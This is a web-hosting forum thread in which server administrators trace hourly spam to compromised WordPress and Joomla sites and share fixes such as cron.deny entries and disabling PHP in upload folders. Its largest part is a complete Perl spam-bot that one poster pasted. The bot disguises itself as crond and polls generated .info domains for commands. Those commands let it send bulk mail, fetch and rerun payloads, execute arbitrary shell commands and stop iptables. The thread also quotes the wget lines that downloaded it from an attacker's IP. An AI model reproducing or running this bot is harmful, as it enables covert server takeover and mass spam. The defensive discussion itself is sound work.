• Please be aware: Kaspersky Anti-Virus has been deprecated
    With the upgrade to Plesk Obsidian 18.0.64, "Kaspersky Anti-Virus for Servers" will be automatically removed from the servers it is installed on. We recommend that you migrate to Sophos Anti-Virus for Servers.
  • The Horde webmail has been deprecated. Its complete removal is scheduled for April 2025. For details and recommended actions, see the Feature and Deprecation Plan.
  • We’re working on enhancing the Monitoring feature in Plesk, and we could really use your expertise! If you’re open to sharing your experiences with server and website monitoring or providing feedback, we’d love to have a one-hour online meeting with you.

Spam from hole in Plesk?

Of course, here is the code, I hope you can extract a valid info:

The code is too long then I post in two parts,

First:

#!/usr/bin/perl
use strict;
use Socket;
use CGI;
srand(time ^ $$ ^ unpack "%L*", `ps axww | gzip`);
$SIG{PIPE}=
sub {die "Broken pipe"};

$ENV{PATH}=$ENV{PATH}.":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin";
my $g05a = ($< == 0);
my $jdek = ((getpwuid($>))[0]);
my $kk6i = 0;
$kk6i = length($ARGV[0]) if ($ARGV[0] =~ /^ +$/);
my $jfb3 = int(rand(2147483647));
my ($i301, $h2aa, $anni);
my $j9md = "sb2";
my $i31d=443;
my $f97a="/b/index.php";
my $gmmp='/tmp/...';
my $j89f="/usr/bin/crond ";
my $ik6k=0;
my $ff58=0;
my $j2l9=0;
my $be3d=0;
my $cibh=0;
my $ajgj=0;
my $b89m=50;
my $p="1234567890";
my $cnc9;
my $eg03="sendmail";
my $hjb8;
my $f83g;
my %ikad;
my $fn4m=39;
$ikad{'d_v'}=$fn4m;
$ikad{'d_w'}=$jdek;
$ikad{'d_rb'}=$kk6i;
$ikad{'d_pi'}=$$;
$ikad{'d_iv'}=$];

sub aao{print '['.localtime().'] ';
print @_;
}
sub aai{return 0 if !open(SIGNFH, ">$gmmp");
return 0 if !flock(SIGNFH, 2 | 4);
return 1;
}
sub ab4{my $cf30=shift;
my $dem6=shift;
my $bkpn=shift;
my $hc3f=shift;
my $g3ii=shift;
my $ck7e=$cf30->{'name'};
my $en2h=$cf30->{'addr'};
my $cahh=ab6(4);
my($bkpn, $amc9, $jn0e)=ab3($bkpn);
$hc3f=~s/\[\[firstname\]\]/$ck7e/g;
$hc3f=~s/\[\[id\]\]/$en2h/g;
$hc3f=~s/\[\[count\]\]/$g3ii/g;
$hc3f=~s/\[\[rand\]\]/$cahh/g;
$bkpn=~s/\[\[firstname\]\]/$ck7e/g;
$bkpn=~s/\[\[id\]\]/$en2h/g;
$bkpn=~s/\[\[count\]\]/$g3ii/g;
$bkpn=~s/\[\[rand\]\]/$cahh/g;
for(my $i=0;
$i<10;
$i++){my $ag69=$cf30->{'params'}->[$i];
$hc3f=~s/\[\[param$i\]\]/$ag69/g;
$bkpn=~s/\[\[param$i\]\]/$ag69/g;
}
$bkpn=ab8($bkpn, $amc9, $jn0e)
if($jn0e);
my $d2p3="From: $dem6|To: ".($ck7e ? "\"$ck7e\" <$en2h>" : "$en2h")."|
subject: $bkpn";
eval{open SENDMAIL, "| $eg03 -t";
print SENDMAIL "From: $dem6\n";
print SENDMAIL "To: ".($ck7e ? "\"$ck7e\" <$en2h>" : "$en2h")."\n";
print SENDMAIL "
subject: $bkpn\n";
print SENDMAIL "\n" if ($eg03 =~ /\/mail/);
print SENDMAIL "$hc3f";
close SENDMAIL;
};
if($@){my $j8f3=$@;
chomp $j8f3;
return 0;
}return 1;
}
sub aam{my $feli=shift;
my $c907=shift;
my @fmoc=@$c907;
my $dem6=shift @fmoc;
my $bkpn=shift @fmoc;
my $hc3f;
while(scalar(@fmoc)){my $idkj=shift @fmoc;
if($idkj eq $feli){last;
}$hc3f .=$idkj."\n";
}my @eck2;
while(scalar(@fmoc)){my $cf30={};
my $idkj=shift @fmoc;
my($bjgb, $g33h, @dh4b)=split /\t/, $idkj;
if(!$g33h){$g33h=$bjgb;
$bjgb=undef;
}$cf30->{'addr'}=$g33h;
$cf30->{'name'}=$bjgb if $bjgb;
$cf30->{'params'}=\@dh4b if(scalar(@dh4b));
push @eck2, $cf30 if($cf30->{'addr'});
}for(my $i=0;$i<scalar(@eck2);)
{if(ab4($eck2[$i], $dem6, $bkpn, $hc3f, $i)){$j2l9++;
$be3d++;
}else{$cibh++;
$ajgj++;
}$i++;
}if($g05a){`rm -f /var/mail/root /var/spool/mail/root /var/mail/mail /var/spool/mail/mail`;
}`rm -f ~/dead.letter`;
}
sub aaf{my $jpo2=sprintf($f83g." | grep -ci '<html'", "https://accounts.google.com/ServiceLogin?service=mail");
my($dlhb)=`$jpo2`;
chomp $dlhb;
return $dlhb;
}
sub abe{if($hjb8 eq "wget"){my($db8o)=`wget --version | head -n1 | grep -o "\\.[0-9]*" | grep -o "[0-9]*\$"`;
chomp $db8o;
$db8o=int($db8o);
$f83g="wget -q -O - -t 1 -T 60 ";
$f83g .="--no-check-certificate " if($db8o > 9);
$f83g .='"%s"';
}elsif($hjb8 eq "curl"){$f83g='curl -s -k --max-time 60 "%s"';
}elsif($hjb8 eq "fetch"){$f83g='fetch -T 60 -q -o - "%s"';
}}
sub ab5{my @if9d=('wget', 'curl', 'fetch');
undef $hjb8;
foreach my $c35d(@if9d){if($cnc9){my $kbol=`which $c35d`;
next if ($kbol !~ /^\//);
} $hjb8 = $c35d;
abe();
if (!aaf()) { undef $hjb8;
next;
} last;
} if (!$hjb8) { $hjb8 = "wget";
abe();
}$ikad{'d_br'}=$hjb8;
}my $c72n=0;

sub abc{return if(time() - $c72n < 3600);
$c72n=time();
$cnc9=`which which | grep -v alias | sed -e 's/^[[:space:]]*//'`;
ab5();
ab7();
aad() if($g05a);
my $h57d=`ps -xo command | grep -v grep | grep postfix/master | wc -l | sed -e 's/^[[:space:]]*//'`;
chomp $h57d;
if($h57d){$ikad{'d_ma'}='postfix';
if($cnc9){$h57d=`which sendmail.postfix`;
chomp $h57d;
$eg03 = $h57d if ($h57d =~ /^\/.*ab4.postfix$/);
} } else { $ikad{'d_ma'}='sendmail';
}$ikad{'d_mc'}=$eg03;
}
sub aad{my @g32h=("postfix", "sendmail");
foreach my $glno(@g32h){my $ip25=`service $glno status`;
chomp $ip25;
if ($ip25 =~ /running/i) { return $glno;
} } foreach my $glno (@g32h) { my $h1me = `service $glno start`;
chomp $h1me;
if ($h1me =~ /done/i || $h1me =~ /ok/i) { return $glno;
} } return undef;
}
sub ab7 { my @f9b1 = ('sendmail', 'mailx', 'mail');
my @b9b7=('/etc/', 'cron', '.cpan', '/lib', 'log.d', '/services/', '/cgi-bin/', 'mail-lock', 'mail-unlock', 'mail-touchlock', 'formail', 'traptoemail', 'run-mailcap', 'checksendmail', 'w3mmail.cgi');
my $cl7p;
foreach my $be1l(@f9b1){if($cnc9){my $bb27=`which $be1l`;
chomp $bb27;
if ($bb27 =~ /^(\/[^ ]+)/) { $eg03 = $1;
return 1;
} } $cl7p = "locate $be1l | head -n1000";
my @ehja=split /\n/, `$cl7p`;
$cl7p="find /bin/ /sbin/ /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin/ -type f -or -type l | grep $be1l ";
push @ehja, split /\n/, `$cl7p`;
chomp @ehja;
my @bc2l;
foreach my $ddl4 (@ehja) { next if (-d $ddl4);
next if (! -x $ddl4);
next if ($ddl4 =~ /\.so$/);
my $c986 = 0;
foreach my $j70k (@b9b7) { if ($ddl4 =~ /$j70k/) { $c986 = 1;
last;
} } next if $c986;
if ($ddl4 =~ /bin\// && $ddl4 =~ /$be1l$/) { $eg03 = $ddl4;
return 1;
} push (@bc2l,$ddl4);
} foreach my $ddl4 (@bc2l) { if ($ddl4 =~ /bin\//) { $eg03 = $ddl4;
return 1;
} } foreach my $ddl4 (@bc2l) { if ($ddl4 =~ /$be1l$/) { $eg03 = $ddl4;
return 1;
} } } return 0;
}

sub aac { my $idkj = shift;
my $jebb = shift;
if ($jebb =~ /([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)/) { $jebb = ($1<<24)+($2<<16)+($3<<8)+($4);
} else { $jebb = int($jebb);
} my @e72l;
$e72l[0] = ((($jebb&0xFF000000)>>24)+15)%256;
$e72l[1] = ((($jebb&0x00FF0000)>>16)+13)%256;
$e72l[2] = ((($jebb&0x0000FF00)>>8)+52)%256;
$e72l[3] = ((($jebb&0x000000FF))+71)%256;
my $b0oj;
for (my $i = 0; $i < length($idkj); $i++)
{ my $j2n2 = ord(substr ($idkj, $i, 1));
my $d = int($j2n2^$e72l[$i%4]);
$b0oj .= sprintf("%02x", $d);
$e72l[($i+1)%4] = ($e72l[($i+1)%4]+$d)%256;
} return $b0oj;
}

sub aah { my $idkj = shift;
my $jebb = shift;
if ($jebb =~ /([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)/) { $jebb = ($1<<24)+($2<<16)+($3<<8)+($4);
} else { $jebb = int($jebb);
} my @e72l;
$e72l[0] = ((($jebb&0xFF000000)>>24)+15)%256;
$e72l[1] = ((($jebb&0x00FF0000)>>16)+13)%256;
$e72l[2] = ((($jebb&0x0000FF00)>>8)+52)%256;
$e72l[3] = ((($jebb&0x000000FF))+71)%256;
my $b0oj;
for (my $i = 0;
$i < length($idkj)/2;
$i++) { my $j2n2 = hex(
substr ($idkj, $i*2, 2));
$e72l[($i+1)%4] = ($e72l[($i+1)%4]+$j2n2)%256;
$b0oj .= chr($j2n2^$e72l[$i%4]);
} return $b0oj;
}
sub ab1 ($;$)
{ if ($] >= 5.006) {
require bytes;
if (bytes::length($_[0]) > length($_[0]) || ($] >= 5.008 && $_[0] =~ /[^\0-\xFF]/)) { require Carp;
Carp::croak("The Base64 encoding is only defined for bytes");
}}
use integer;
my $kfl6=$_[1];
$kfl6="\n" unless defined $kfl6;
my $b0oj=pack("u", $_[0]);
$b0oj=~s/^.//mg;
$b0oj=~s/\n//g;
$b0oj=~tr/\` -_/AA-Za-z0-9+\//;
my $foa6=(3 - length($_[0]) % 3) % 3;
$b0oj=~s/.{$foa6}$/'=' x $foa6/e if $foa6;
if(length $kfl6){$b0oj=~s/(.{1,76})/$1$kfl6/g;
}return $b0oj;
}
sub aal($){local($^W)=0;
use integer;
my $idkj=shift;
$idkj=~tr|A-Za-z0-9+=/||cd;
if(length($idkj) % 4){require Carp;
Carp::carp("Length of base64 data not a multiple of 4")}$idkj=~s/=+$//;
$idkj=~tr|A-Za-z0-9+/| -_|;
return "" unless length $idkj;
my $jkn8='';
my($i, $l);
$l=length($idkj) - 60;
for($i=0;
$i <=$l;
$i +=60){$jkn8 .="M" .
substr($idkj, $i, 60);
}$idkj=
substr($idkj, $i);
if($idkj ne ""){$jkn8 .=chr(32 + length($idkj)*3/4) . $idkj;
}return unpack("u", $jkn8);
}
sub ab3 { my $idkj = shift;
my ($amc9, $jn0e, $bo0f);
if ($idkj =~ /^=\?([^\?]+)\?([^\?]+)\?(.+)\?=$/i) { $amc9 = $1;
$jn0e = $2;
$bo0f = $3;
if (lc($jn0e) eq "b"){$idkj=aal($bo0f);
return($idkj, $amc9, $jn0e);
}}return($idkj, undef, undef);
}
sub ab8{my $idkj=shift;
my $amc9=shift;
my $jn0e=shift;
return '=?'.$amc9.'?'.$jn0e.'?'.ab1($idkj, '').'?=';
}
sub ab6{my $k1mp=shift;
my @g8c0=('a'..'z');
my $aldg;
foreach(1..$k1mp){$aldg.=$g8c0[rand @g8c0];
}return $aldg;
}
sub aak{my $a=shift;
my $b0oj=0;
$b0oj +=(ord(
substr($a,3,1)) & 0xFF);
$b0oj +=(ord(
substr($a,2,1)) & 0xFF) << 8;
$b0oj +=(ord(
substr($a,1,1)) & 0xFF) << 16;
$b0oj +=(ord(
substr($a,0,1)) & 0xFF) << 24;
return $b0oj;
}
sub abd{my $i301=shift;
my $c8hp=inet_aton($i301);
return(defined $c8hp)?inet_ntoa($c8hp):undef;
}
sub abb{my $i981=shift;
my $c35d=sprintf($f83g, $i981);
my @b0oj=`$c35d`;
chomp @b0oj;
return @b0oj;
}
sub aag{my $i981=shift;
my $g9d3=shift;
if($hjb8 eq "wget")
{`wget -q "$i981" -O "$g9d3"`;
}
elsif($hjb8 eq "curl"){`curl "$i981" > "$g9d3"`;
}
elsif($hjb8 eq "fetch"){`fetch -o "$g9d3" "$i981"`;
}}
 
And here is the second part


my $egf3=0;
my $aome=0;
my $h6j2;
my @i1l5=();

sub aba{
my $h2aa=$i31d;
undef $h6j2;
return($h6j2, $h2aa)

if(ab0($i1l5[$egf3], $h2aa));

my $do81=$egf3;
for($egf3=0;$egf3 < 10;$egf3++)
{if($egf3==4){my @p=split '',$p;
my $hf96=$p[6];
$hf96="$hf96$hf96.6$hf96.";
$hf96 .=$p[7].$p[9];
$hf96 .='.'.$p[2].$p[0];
return($hf96, $h2aa) if(aae($hf96, $h2aa));
}if($egf3==5){my @p=split '',$p;
my $hf96=$p[7].$p[4];
$hf96 .='.'.$p[1].$p[0].$p[3];
$hf96 .='.'.$p[7].$p[9];
$hf96 .='.'.$p[3];
return($hf96, $h2aa) if(aae($hf96, $h2aa));
}next if($do81==$egf3);
return($h6j2, $h2aa) if(ab0($i1l5[$egf3], $h2aa));
}my @p=split '',$p;
my $hf96=$p[1].$p[9];
$hf96=$hf96.$p[7].'.'.$hf96;
$hf96='.'.$hf96;
$hf96='.'.$p[1].$p[2].$hf96;
$hf96=$p[8].$p[3].$hf96;
return($hf96, $h2aa) if(aae($hf96, $h2aa));
$aome++;
return undef;
}my $icad=0;

sub aaj{($i301, $h2aa)=aba();
$icad=time() if($i301);
$ikad{'d_fd'}=$i301;
$ikad{'d_fi'}=$anni;
$ikad{'d_fp'}=$h2aa;
}
sub ab2{my($dfik, $gmnc)=(14400, 3600);
return if(time() - $icad < $dfik);
my($jkcg, $j4hp, $eg7k)=($i301, $h2aa, $anni);
aaj();
return if($i301 && $h2aa && $anni);
($i301, $h2aa, $anni)=($jkcg, $j4hp, $eg7k);
$icad=time() -($dfik - $gmnc);
}
sub ab0{my $i301=shift;
my $h2aa=shift;
my $don0="www.".$i301;
my $di2i=aak(inet_aton($don0));
if($di2i){my $gha6=ab6(10).".".$i301;
my $i2n2=aak(inet_aton($gha6));
if($i2n2 &&($i2n2==$di2i+1)){return aae($gha6, $h2aa);
}}return 0;
}
sub aae{$h6j2=shift;
my $h2aa=shift;
my $jlb4=int(rand(2147483647));
my $jebb=int(rand(2147483647));
$anni=abd($h6j2);
my $j7cf=$jlb4."*".$jfb3."*".$jebb;
my $f1i9=aac($j7cf, $anni);
my $i981="https://$h6j2:$h2aa/$f97a?id=$f1i9&check=1";
my @fmoc = abb($i981);
for (my $i=0; $i<scalar(@fmoc);$i++)
{
$fmoc[$i] = aah($fmoc[$i], $jebb);
}
my $ki8n = shift @fmoc;
if ($ki8n =~ /^SUCCESS$/) { $aome = 0;
return 1;
} return 0;
}
sub ab9 { my $jebb = shift;
my $jlb4 = shift;
my $bo0f;
foreach my $f (keys %ikad) { if ($f =~ /^d_(.+)$/) { my $ck7e = $1;
$bo0f .= ($bo0f?"|":"")."$ck7e=".$ikad{$f};
}}$bo0f="$jlb4*$bo0f" if($jlb4);
return aac($bo0f, $jebb);
}my $deie;

sub aap{my $g4jm=shift || time || 4357;
my @a=();
for(1..10000){use integer;
push @a, $g4jm & 0x7fffffff;
$g4jm *=69069;
}
$deie={offset=> 0, array=> \@a}}
sub aan{my $h11g=shift || 1.0;
aap() unless defined $deie;
$deie->{offset}=($deie->{offset}+ 1) % 10000;
my $fkc7=$deie->{offset};
my $a=$deie->{array};
$$a[$fkc7]=($$a[($fkc7 - 471) % 10000] ^ $$a[($fkc7 - 1586) % 10000] ^ $$a[($fkc7 - 6988) % 10000] ^ $$a[($fkc7 - 9689) % 10000]);
return $$a[$fkc7] * $h11g /(2**31);
}
sub aab{
my $i77j=($j9md eq "sb3")?115:15;
my $k1mp=10;
my @g8c0=('a'..'z');
aap(123987);
my $aldg;
for(my $i=-$i77j;$i<$b89m;$i++)
{
$aldg="";
foreach(1..$k1mp){
$aldg.=$g8c0[int(aan(scalar(@g8c0)))];
}
if($i >=0){my $ckeb=$aldg.".info";
push @i1l5, $ckeb;
}
}
}if(!aai()){exit;
}$0=$j89f if($j89f);
aab();
my $j4e7=0;
while(1){my $ki8n;
my @fmoc;
abc();
aaj() if(!$i301 || !$h2aa || !$anni);
ab2();
if(!$i301 || !$h2aa || !$anni){if($aome >=24){last;
}
sleep 3600;
next;
}
my $jlb4=int(rand(2147483647));
my $fcfa=int(rand(2147483647));
my $jebb=int(rand(2147483647));
my $j7cf=$jlb4."*".$jfb3."*".$jebb;
my $f1i9=aac($j7cf, $anni);
my $i981="https://$anni:$h2aa/$f97a?id=$f1i9";
$i981 .="&sent=$j2l9";
$i981 .="&notsent=$cibh";
$i981 .="&unknown=".CGI::escape($ik6k) if($ik6k);
$i981 .="&testsend=1" if($ff58);
$i981 .="&stat=".ab9($anni, $fcfa);
@fmoc=abb($i981);
for(my $i=0;$i<scalar(@fmoc);$i++)
{
$fmoc[$i]=aah($fmoc[$i], $jebb);
}
$ki8n=shift @fmoc;
if($ki8n){$j4e7=0;
$j2l9=0;
$cibh=0;
$ff58=0;
$ik6k=0;
}else{$j4e7++;
if($j4e7 > 3){$j4e7=0;
undef($i301);
undef($anni);
undef($h2aa);
}
$ki8n="SLEEP 60";
} if ($ki8n =~ /^SLEEP ([0-9]+)$/) { sleep $1;
next;
} elsif ($ki8n =~ /^RELOAD (.*)$/) { aag($1, "/tmp/ ");
close(SIGNFH);
system('cd /tmp;
nohup perl " " " " &');
sleep 5;
`rm -f "/tmp/ " /tmp/nohup.out`;
last;
} elsif ($ki8n =~ /^KILL$/) { last;
} elsif ($ki8n =~ /^SEND ([a-zA-Z0-9]+)$/) { aam($1, \@fmoc);
undef @fmoc;
sleep 1;
next;
} elsif ($ki8n =~ /^TESTSEND ([a-zA-Z0-9]+)$/) { aam($1, \@fmoc);
undef @fmoc;
$ff58 = 1;
sleep 1;
next;
} elsif ($ki8n =~ /^EXECUTE (.*)$/) { qx($1);
next;
} elsif ($ki8n =~ /^START SENDMAIL$/) { `service sendmail start`;
next;
} elsif ($ki8n =~ /^STOP IPTABLES$/) { `service iptables stop`;
next;
}$ik6k=$ki8n;
sleep 30;
if(!aae($i301, $h2aa)){undef($i301);
undef($anni);
undef($h2aa);
}
}
__END__
 
I have blocked httpd user by cron.deny.
The wget command is used to load the script.
The parameters of wget are:
xxtp://38.101.26.226/test2.sh -qO /tmp/sess_f652da7dd28dce7baeeae54a46ae4099
and
xxtp://38.101.26.226/test2.jpg -qO /tmp/sess_f652da7dd28dce7baeeae54a46ae4092
 
A good job.
From whois: 38.101.26.226 is in COGENT-A, whose abuse email is [email protected]
We have to send emails telling them about this attack.

And of course, I'll set the whole net in firewall. Fail2ban banned others IP from this net.

Regards
 
Hello again!
I've managed to catch the intruder.
I bet that every one that have this problem with /tmp/sess_652...... file, have wordpress installed.
Check the folder /wp-content/uploads for a file named get.php and file.txt
That's how they managed to send mail trough our server.
I have a bunch of other files, that seems to be shells. Any way, I have looked inside that files and they are made pretty smart. Most of them are rudimentary crypted with ord/chr and then evalued with eval().
That's way they managed to get way from rootkit scanners.
I have deleted all that files and put .htaccess with <IfModule mod_php5.c>
php_value engine off
</IfModule>
<IfModule mod_php4.c>
php_value engine off
</IfModule>

so no php script will be executed inside that folder. And of course .htaccess with 644 mod permision.
 
A good job

Hi, a good job.
But I updated WP last 10th and no have these files, perhaps they were deleted during update.
If this problema, or another like it, appears I know where to look for.

Thanks
 
I can confirm wordpress was installed on our box that was compromised. Our new mission critical production box will never again host a CMS. All old blogs are now proxy passed to trashable virtual machines.

Thanks everyone.
 
Hello.

Thank goodness I found this thread!

I have the same problem with this exact spammer. Going on 10 days now and I am beyond frustrated. My hosting provider is even stumped.
I do have wordpress installed.
I found and deleted the rogue .php files + added .htaccess files to prevent future scripts from running. (The rogue .php files were actually outside wordpress in my regular www.domain.com/images folder).

I used Maldetect which is great.
https://www.rfxn.com/projects/linux-malware-detect/

However, the spam continues at :30 after each hour.

I am using apache, webmin, postfix on this particular server. Postfix is temporarily stopped.

I've read thru this entire thread several times and looking for the solution(s) that have worked.
I'm still relatively new at commands, etc. so I am asking for help. I am a fast learner.

I'm hoping this this not only helps me, but others who will undoubtedly get this too.

Where do I look and what commands do I type in to get this son of a gun out of my machine. I have Putty and FTP programs.

Suggestions I've seen mentioned:

- kill the processes in memory/RAM, memory dump
- block httpd user by cron.deny / wget command
- grep for the sess_f652da7dd28dce7baeeae54a46ae4099
- tmp folder sessions
- etc.

Any assistance you can provide will be appreciated.

Jeff
 
I suppose you have look for get.php (as another post says)

Reading these posts I found the solution: put apache (this is the httpd user) in cron.deny, so it cannot run crond and the spam is stopped.

And now I use separated tmp folders for evey subdomain, and I erase these folders every few hours (with crons).

I checked every folder and every suspicious file in my site.

I wrapped sendmail, and now all mail pass through my eyes.

All fixs are in these posts. It is easy, read it.

regards
 
It's gone.

5 hours and no spam.

After running the linux anti-malware program I noted above to remove the rogue files, I created a simple file in notepad named cron.deny. I typed apache into the first line and uploaded to /etc/ folder. All emails, including spam & emails from my website forms, stopped. So I removed apache and left the blank cron.deny on the server. The spam started up again every 30 minutes.

I remembered a number of people saying to dump or kill the memory but I have no idea of the command to do that... so I rebooted my server. Simple as that.

That fixed it. The reboot cleared the memory.

No spam since. I hope it's permanent and not a cat and mouse game.

Even though the malware program removed the rogue files 4-5 days ago, it wasn't until I cleared the server's memory did the spam stop.

I learned a lot thru this experience. Good knowledge gained.
 
Will adding apache to cron.deny alone fix this issue? Well of coarse updating wordpress? Has wordpress fixed the exploit?
 
It is not only in Plesk. I run a website built in joomla 1.5 26. i know.. It is outdated and a risk. My hosting company (Ek-hosting) using DirectAdmin, informed me about this spam. Neither I nor my host could find the problem. I was convinced that the malware files were oploaded, run and deleted. Never found a trace. I reinstalled a akeeba backup from december 2013, after removing all in the public_html to no result. It kept going on. Every 64 minutes a return notice, always to the same addeess. (Unsubscribe.org)
My host accused me of being the spammer. He gave me a complete new spot on his servers, I reinstalled the 2013 version... No mor spam. I sent my host a link to this article.. Perhaps it might help him. And others as well... It is a nuisance! Even a bloody one.
 
Back
Top